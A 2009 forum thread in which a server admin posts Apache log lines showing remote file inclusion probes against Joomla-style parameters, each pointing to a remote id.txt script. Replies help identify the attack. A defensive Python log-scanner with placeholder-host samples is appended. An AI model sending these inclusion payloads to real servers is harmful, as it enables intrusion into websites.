How To Stop Attacks Coming From 'localhost.localdomain'?


giganet
27th March 2009, 07:19
Hello Group...

Tonight I was looking over various logs in one of my servers and found when running 'tail -f /var/log/apache2/access.log' I see what appears to be an attack !!!???

The output of 'tail -f /var/log/apache2/access.log'

localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:11:15 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:15:11 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:15:12 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:17:38 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:17:39 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:24:39 -0700] "GET /?option=com_content&v...i-asterisk-1-6-x&Itemid=6//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:24:40 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"


Thanking you in advance for your help.

Best Regards

robilaur
27th March 2009, 13:28
delete id.txt and ban user :D

Ben
27th March 2009, 14:35
Looks like an attack on Joomla or a similar CMS?
When googling for some of the parameters, e.g. mosConfig_absolute_path or reflect_base, it looks like moscms or Joomla.

giganet
27th March 2009, 18:50
Thank you for the replies...

Robilaur:

I searched the box for 'id.txt' but this file is non-existent.

Also, how would I go about banning the user?
I am not seeing any particular IP he is coming from, only 'localhost.localdomain'?


Ben:

Hmm, I never did personally like Joomla and the application has yet to be used so I just removed it entirely from the server.

But I would still like to know how to ban the 'user' responsible though, your suggestions are very welcome.

Thank you for your help...

Best Regards
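
One way to pull requests like those in the first post out of an access log, added here as an example and not posted by anyone in the thread: it flags any request whose query string sets a parameter to a remote URL, undoing repeated percent-encoding first, and tallies hits by the logged client field and user agent. The sample lines are constructed to match the shape of the posted log, with `remote.example` as a placeholder host, and the function names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                     r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"$')
# name=<remote URL>, matched anywhere in the decoded query string
REMOTE_PARAM = re.compile(r'([^=&?/]+)=((?:https?|ftp)://[^&\s]+)', re.I)

def fully_unquote(text, rounds=3):
    """Undo repeated percent-encoding, e.g. %255B -> %5B -> [."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_remote_includes(line):
    """Parse one log line; return host, agent and (param, url) pairs, or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    query = fully_unquote(m.group("target").partition("?")[2])
    return {"host": m.group("host"), "agent": m.group("agent"),
            "params": REMOTE_PARAM.findall(query)}

def summarize(lines):
    """Tally flagged requests by (client field, user agent) and by parameter name."""
    by_client, by_param = Counter(), Counter()
    for line in lines:
        hit = find_remote_includes(line)
        if hit and hit["params"]:
            by_client[(hit["host"], hit["agent"])] += 1
            by_param.update(name for name, _ in hit["params"])
    return by_client, by_param

# Constructed sample: three lines shaped like the posted log (placeholder host), one benign.
PROBE = 'localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?%s HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"'
SAMPLE = [
    PROBE % "reflect_base=http://remote.example/id.txt%3f%3f%3f",
    PROBE % "option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://remote.example/id.txt%3f%3f%3f",
    PROBE % "path%255Bdocroot%255D=http://remote.example/id.txt%3f%3f%3f",
    '192.0.2.10 - - [26/Mar/2009:13:30:00 -0700] "GET /index.php?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    clients, params = summarize(SAMPLE)
    print(clients.most_common(), params.most_common())
```

The match is a triage heuristic: a legitimate parameter that carries a URL, such as a redirect target, is flagged as well, so review the hits before acting on them.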